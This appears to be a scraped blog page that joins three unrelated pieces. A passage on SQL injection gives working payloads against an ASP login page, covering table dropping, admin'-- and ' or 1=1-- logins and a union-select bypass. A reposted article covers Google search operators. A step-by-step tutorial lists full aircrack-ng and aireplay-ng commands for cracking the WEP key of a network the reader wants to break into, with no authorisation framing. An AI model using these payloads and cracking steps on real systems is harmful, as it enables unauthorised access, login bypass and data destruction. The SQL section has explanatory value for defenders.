An important point to note here is that the string literals 'john' and 'smith' are delimited with single quotes. Presuming that the 'forename' and 'surname' fields are being gathered from user-supplied input, an attacker might be able to 'inject' some SQL into this query, by inputting values into the application like this:
Forename: jo'hn
Surname: smith
The 'query string' becomes this:
select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'
When the database attempts to run this query, it is likely to return an error:
Server: Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near 'hn'.
The reason for this is that the insertion of the 'single quote' character 'breaks out' of the single-quote delimited data. The database then tried to execute 'hn' and failed. If the attacker specified input like this:
Forename: jo'; drop table authors--
Surname:
…the authors table would be deleted, for reasons that we will go into later.
It would seem that some method of either removing single quotes from the input, or 'escaping' them in some way would handle this problem. This is true, but there are several difficulties with this method as a solution. First, not all user-supplied data is in the form of strings. If our user input could select an author by 'id' (presumably a number) for example, our query might look like this:
select id, forename, surname from authors where id=1234
In this situation an attacker can simply append SQL statements on the end of the numeric input. In other SQL dialects, various delimiters are used; in the Microsoft Jet DBMS engine, for example, dates can be delimited with the '#' character. Second, 'escaping' single quotes is not necessarily the simple cure it might initially seem, for reasons we will go into later.
We illustrate these points in further detail using a sample Active Server Pages (ASP) 'login' page, which accesses a SQL Server database and attempts to authenticate access to some fictional application.
This is the code for the 'form' page, into which the user types a username and password:




























The critical point here is the part of 'process_login.asp' which creates the 'query string' :
var sql = "select * from users where username = '" + username + "' and password = '" + password + "'"; If the user specifies the following:
Username: '; drop table users--
Password:
..the 'users' table will be deleted, denying access to the application for all users. The '--' character sequence is the 'single line comment' sequence in Transact-SQL, and the ';' character denotes the end of one query and the beginning of another. The '--' at the end of the username field is required in order for this particular query to terminate without error.
The attacker could log on as any user, given that they know the users name, using the following input:
Username: admin'--
The attacker could log in as the first user in the 'users' table, with the following input:
Username: ' or 1=1--
…and, strangely, the attacker can log in as an entirely fictional user with the following input:
Username: ' union select 1, 'fictional_user', 'some_password', 1--
The reason this works is that the application believes that the 'constant' row that the attacker specified was part of the recordset retrieved from the database.

Tuesday, June 1, 2010

20 Great Google Secrets

http://www.pcmag.com/article2/0,4149,1306756,00.asp

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif



Google is clearly the best general-purpose search engine on the Web (see

www.pcmag.com/searchengines

But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at

www.google.com/help/operators.html

. Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as

www.mysite.com/index.html

, you can enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in

link:http://www.pcmag.com


Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to life the universe and everything."

Let Google help you figure out whether you've got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try "thre blund mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).




Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
(http://froogle.google.com),

which indexes products from online stores, and Google Catalogs
CODE
(http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at

www.google.com/options/index.html

You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(www.googlealert.com)

monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com),

a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search

(http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from
CODE
www.google.com/apis

. See the figures for two more examples, and visit

www.pcmag.com/solutions

for more.

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.


Online Extra: More Google Tips


Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE
http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif


), but an easier way is to do a Google daterange: search by filling in a form at

www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml

. If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(www.staggernation.com/gawsh/).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(www.staggernation.com/garbo/).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.

Monday, May 31, 2010

Tutorial: Crack WEP with aircrack + inject packets (WINDOWS)


Okay this is my first tutorial so go easy on me.
This is a tutorial for cracking WEP and injecting packets for networks with no clients. You'll be able to do so on a windows platform (tested in VISTA and works)!
-------------------------------------------------------------------------------------------
- Next step is to download this .dll file (again only commview driver users):
http://darkircop.org/commview.dll (you have it in folder „TOOLS“)

- Next up, download the aircrack package. Download it here:
http://www.aircrack-ng.org/ (you have it in folder „TOOLS“)


unzip the file to your c:\ drive (it can be another drive but this is the easiest)

put the commview.dll file you just downloaded in the map you extracted (it's called aircrack and if you extracted it to your c: drive like I said it should be in c:\aircrack\)

Now go to you place where you installed Commview in (the program itself) and look for a file called "ca2k.dll" (default install dir is c:\program files\commview for wifi\)

Copy this file to the same folder as the commview.dll (c:\aircrack\)

OKAY that was a whole lot! this was just to get everything ready! If you did all of this correct you'll be able to move to the next step!
-------------------------------------------------------------------------------------------
THE CRACKING:
Step 1:
- Open a command prompt (start > run > cmd.exe)
Step 2:
- type the following in the command prompt:
cd c:\aircrack\

- HIT ENTER
Step 3:
- type the following in the same command prompt:
airserv-ng -d commview.dll

- HIT ENTER
- You should see something like this coming up in the command prompt
Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666

Step 4:
- Open a new command prompt (
LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!)
- Typ the following the the new command prompt:
cd c:\aircrack\

-HIT ENTER
Step 5:
- Now typ this in the same command prompt:
airodump-ng 127.0.0.1:666

- HIT ENTER
note: if you know what channel the to-monitor-network is on you can make it this. I recommend this!:
airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666


Airodump-ng should start capturing data from the networks on the given channel now, you'll notice it isn't going fast (except if it's a big company's network or something). We are going to speed this process up!
Take a note of the following:
1: BSSID of the network you want to crack = MAC address.2: ESSID of the network you want to crack = name of the network (example: wifi16, mynetwork,...)3: The mac of the card you are using to monitor the packets
LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!
Step 6:
- Open a new command prompt
- Type in the following:
cd c:\aircrack\

- HIT ENTER
Step 7:
- Type in the following in command prompt:
aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing so a quick example:
ESSID = wifi16
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666


if all goes well you'll get this as the outcome:
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful


if you get:
AP rejects the source MAC address

It means MAC filtering is enabled on the network you want to crack and you'll need to get hold of a mac address that's allowed access.

if you keep getting:
sending authentication request

Try moving closer to the AP!
Step 8:
in the same command prompt as the one in step 7 type:
aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing once again so a quick example:
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666


if all goes well you'll get this:
Waiting for a data packet...
Read #number packets...


Step 9:

if you wait a little bit you'll soon be prompted with a packet like this:

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = the bssid
Dest. MAC = the dest mac
Source MAC = the source mac

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....
0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ?

note: size can vary, I always pressed in y and it worked
- press in Y
- HIT ENTER

You should see something like this coming up (or similar):
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in
fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Note 1: It doesn't need to be 1500 bytes!!
Note 2: Check the bold part, you're going to need this file!

AGAIN DON'T CLOSE THIS COMMAND PROMPT!!

if you keep getting:
Data packet found!
Sending fragmented packet
No answer, repeating...
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating...
Sending fragmented packet
...

Just keep trying! It automatically starts over again (moving closer to the AP has been reported to help.)



anyways, if you got the bytes of keystream (everything worked) it's time for the next step!
Step 10:
- Press CTRL + C in the command prompt used in step 8
- Now type in the following:
packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l (= an ELL not a 1) 192.168.1.1 -y fragment-0124-161129.xor -w arp-request


Remember the file I made bold in part 8? Well it's obviously the same as in 9 meaning you need to put the same filename here.
The part I made
green here is the filename you use to save the packet, you can choose whatever you want but you must use this filename in the upcomming steps!
Step 11:
Now that we've got our ARP REQ packet we can start injecting!
Here's how to do this.
- Go to the command prompt used in step 9
- Type in the following:
aireplay-ng -2 -r arp-request 127.0.0.1:666

The green part once again indicates the filename!

You should now see something like this coming up:
Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:AB:CB:9D

0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d .A....l~@.......
0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH......
0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M
0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$.....
0x0040: d64f b709 .O..

Use this packet ?

- Type in Y
- HIT ENTER

This should come up now:
Saving chosen packet in replay_src-0124-163529.cap
You should also start airodump-ng to capture replies.
End of file.

sent #numberOfPackets ... (#number pps)

You'll see the numberOfPackets rising really fast, you are injecting these packets now.
Step 12:
Now go back to the command prompt where you had airodump-ng in open
and press CTRL + C
now type in the following:
airodump-ng --channel CHANNELYOUWANTTOCAPTUREFROM --write Filename 127.0.0.1:666

Note: Filename = The name of the file where the data packets are saved, this will be used in the next step

If all goes correct you should be capturing as much packets per second as you are injecting (maybe even more).
Step 13:
when you think you have enough...
note: 200000 min for 64bit (just capture 1Million to be sure)
...press CTRL + C in the command prompt that has airodump-ng running and enter the following:
aircrack-ng -n 64 Filename.cap

note:
Filename = see previous step
64 = the bit depth of the key (128 for 128bit etc...)


and if it goes like planned a message will pop-up saying:
KEY FOUND: YourKey


That's it! I hope this was helpful, any question/remarks/complaints please ask/tell and I'll try to help/respond as soon as possible!!

Problems?

type this in the command window where the airserv command failed:
airserv-ng -d "commview.dll|debug"

Quotes are important!

You probable get something like this:
Opening card commview.dll|debug
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
get_guid: name: {
15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co
mboCard Gold - Paketplaner-Miniport
Adapter not found
get_guid()
airserv-ng: wi_open(): No error


now type this:
airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"

Quotes are important!

The red parts need to be the same! (they probably differ for everyone)